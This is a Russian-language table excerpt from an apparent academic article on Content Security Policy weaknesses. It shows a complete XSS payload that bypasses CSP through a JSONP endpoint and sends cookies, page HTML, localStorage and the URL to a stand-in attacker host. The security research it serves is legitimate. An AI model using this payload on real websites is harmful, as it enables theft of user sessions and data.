Вернуться к статье
Анализ уязвимостей стандарта Content Security Policy с целью повышения защиты веб-сайтов
Таблица 1 - Пример использования полезной нагрузки сгенерированной с помощью утилиты CSPStealer и метода обхода CSP посредством использования механизма Third-Party EndPoints + JSONP
"><script src="/api/jsonp?callback=(function(){e=encodeURIComponent;document.location=`http://attacker-server.com/?u=${e(location.href)}&c=${e(document.cookie)}&d=${e(document.documentElement.innerHTML)}&l=${e(JSON.stringify(localStorage))}`;setTimeout(stop,3500);})();//"></script> |